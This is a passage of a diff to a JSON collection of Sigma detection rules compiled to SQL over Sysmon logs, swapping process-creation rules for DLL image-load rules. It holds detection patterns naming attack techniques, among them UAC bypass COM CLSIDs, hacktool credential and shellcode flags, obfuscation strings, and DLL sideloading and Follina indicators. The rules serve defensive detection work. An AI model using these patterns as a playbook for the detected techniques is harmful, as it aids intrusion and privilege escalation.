'\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' 
OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND Image LIKE '%\\\\wldp.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_default_accounts_manipulation.yml" + "filename": 
"image_load_side_load_from_non_system_location.yml" }, { - "title": "HackTool - SharpLDAPmonitor Execution", - "id": "9f8fc146-1d1a-4dbf-b8fd-dfae15e08541", - "status": "experimental", - "description": "Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", + "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", + "status": "test", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.discovery" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\SharpLDAPmonitor.exe' ESCAPE '\\' OR OriginalFileName = 'SharpLDAPmonitor.exe') OR (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/dcip:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_sharp_ldap_monitor.yml" + "filename": "image_load_dcom_iertutil_dll_hijack.yml" }, { - "title": "Potential Dosfuscation Activity", - "id": "a77c1610-fc73-4019-8e29-0f51efc04a51", - "status": "experimental", - "description": "Detects possible payload obfuscation via the commandline", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", + "id": 
"9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", + "status": "test", + "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1204.002" ], "falsepositives": [ - "Unknown" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%^^%' ESCAPE '\\' OR CommandLine LIKE '%^|^%' ESCAPE '\\' OR CommandLine LIKE '%,;,%' ESCAPE '\\' OR CommandLine LIKE '%;;;;%' ESCAPE '\\' OR CommandLine LIKE '%;; ;;%' ESCAPE '\\' OR CommandLine LIKE '%(,(,%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC:~%' ESCAPE '\\' OR CommandLine LIKE '% c^m^d%' ESCAPE '\\' OR CommandLine LIKE '%^c^m^d%' ESCAPE '\\' OR CommandLine LIKE '% c^md%' ESCAPE '\\' OR CommandLine LIKE '% cm^d%' ESCAPE '\\' OR CommandLine LIKE '%^cm^d%' ESCAPE '\\' OR CommandLine LIKE '% s^et %' ESCAPE '\\' OR CommandLine LIKE '% s^e^t %' ESCAPE '\\' OR CommandLine LIKE '% se^t %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_dosfuscation.yml" + "filename": "image_load_office_outlook_outlvba_load.yml" }, { - "title": "Base64 MZ Header In CommandLine", - "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", + "title": "Potential DLL Sideloading Via VMware Xfer", + "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", "status": "experimental", - "description": "Detects encoded base64 MZ header in the commandline", + "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", "author": "Nasreddine 
Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" + "filename": "image_load_side_load_vmware_xfer.yml" }, { - "title": "Console CodePage Lookup Via CHCP", - "id": "7090adee-82e2-4269-bd59-80691e7c6338", + "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", + "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", "status": "experimental", - "description": "Detects use of chcp to look up the system locale value as part of host discovery", - "author": "_pete_0, TheDFIRReport", + "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", + "author": "Greg (rule)", "tags": [ - "attack.discovery", - "attack.t1614.001" + "attack.defense_evasion", + "attack.t1202", + "cve.2022.30190" ], "falsepositives": [ - "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND Image LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_chcp_codepage_lookup.yml" + "filename": "image_load_dll_sdiageng_load_by_msdt.yml" }, { - "title": "HackTool - SharpImpersonation Execution", - "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", + "title": "Python Py2Exe Image Load", + "id": "cbb56d62-4060-40f7-9466-d8aaf3123f83", "status": "experimental", - "description": "Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", - "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", + "author": "Patrick St. 
John, OTR (Open Threat Research)", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1134.001", - "attack.t1134.003" + "attack.t1027.002" ], "falsepositives": [ - "Unknown" + "Legitimate Py2Exe Binaries", + "Known false positive caused with Python Anaconda" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Description = 'Python Core' AND NOT ((Image LIKE '%Python%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\')) OR (Image = '')))" ], - "filename": "proc_creation_win_hktl_sharp_impersonation.yml" + "filename": "image_load_susp_python_image_load.yml" }, { - "title": "Suspicious Rundll32 Activity Invoking Sys File", - "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", - "status": "test", - "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Spooler Service Suspicious Binary Load", + "id": "02fb90de-c321-4e63-a6b9-25f4b03dfd14", + "status": "experimental", + "description": "Detect DLL Load from Spooler Service backup folder", + "author": "FPT.EagleEye, Thomas Patzke (improvements)", "tags": [ + "attack.persistence", 
"attack.defense_evasion", - "attack.t1218.011" + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Unknown" + "Loading of legitimate driver" ], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\4\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_sys.yml" + "filename": "image_load_spoolsv_dll_load.yml" }, { - "title": "Group Membership Reconnaissance Via Whoami.EXE", - "id": "bd8b828d-0dca-48e1-8a63-8a58ecf2644f", + "title": "Suspicious WSMAN Provider Image Loads", + "id": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", "status": "experimental", - "description": "Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 
'%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /groups%' ESCAPE '\\' OR CommandLine LIKE '% -groups%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((ImageLoaded LIKE '%\\\\WsmSvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WsmAuto.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Microsoft.WSMan.Management.ni.dll' ESCAPE '\\') OR OriginalFileName IN ('WsmSvc.dll', 'WSMANAUTOMATION.DLL', 'Microsoft.WSMan.Management.dll')) OR (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND OriginalFileName = 'WsmWmiPl.dll')) AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%svchost.exe -k netsvcs -p -s BITS%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k NetworkService -p -s Wecsvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\') AND Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\Configure-SMRemoting.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\ServerManager.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine = '')))" ], - "filename": "proc_creation_win_whoami_groups_discovery.yml" + "filename": "image_load_wsman_provider_image_load.yml" }, { - "title": "TA505 Dropper Load 
Pattern", - "id": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", + "title": "WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load", + "id": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", "status": "test", - "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects signs of the WMI script host process \"scrcons.exe\" loading scripting DLLs which could indciates WMI ActiveScriptEventConsumers EventConsumers activity.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.g0092", - "attack.t1106" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'mshta.exe'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemdisp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshom.ocx' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scrrun.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_ta505_dropper.yml" + "filename": "image_load_scrcons_wmi_scripteventconsumer.yml" }, { - "title": "Renamed Whoami Execution", - "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", + "title": "WMI Persistence - Command Line Event Consumer", + "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", "status": "test", - 
"description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects WMI command line event consumers", + "author": "Thomas Patzke", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.t1546.003", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unknown (data set is too small; further testing needed)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'whoami.exe' AND NOT (Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_whoami.yml" + "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" }, { - "title": "UAC Bypass via ICMLuaUtil", - "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "title": "DLL Load By System Process From Suspicious Locations", + "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", "status": "experimental", - "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when a system process (i.e. located in system32, syswow64, etc.) 
loads a DLL from a suspicious location such as C:\\Users\\Public", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1070" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_icmluautil.yml" + "filename": "image_load_susp_dll_load_system_process.yml" }, { - "title": "Suspicious Service Path Modification", - "id": "138d3531-8793-4f50-a2cd-f291b2863d78", - "status": "test", - "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", - "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Alternate PowerShell Hosts - Image", + "id": "fe6e002f-f244-4278-9263-20e4b593827f", + "status": "experimental", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs 
WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'System.Management.Automation' AND ImageLoaded LIKE '%System.Management.Automation%' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Citrix\\\\ConfigSync\\\\%' ESCAPE '\\') OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (Image = '')))" ], - "filename": 
"proc_creation_win_sc_service_path_modification.yml" + "filename": "image_load_alternate_powershell_hosts_moduleload.yml" }, { - "title": "Potential Browser Data Stealing", - "id": "47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", - "status": "experimental", - "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Azure Browser SSO Abuse", + "id": "50f852e6-af22-4c78-9ede-42ef36aa3453", + "status": "test", + "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", + "author": "Den Iuzvyk", "tags": [ - "attack.credential_access", - "attack.t1555.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "False positives are expected since this rules is only looking for the DLL load event. 
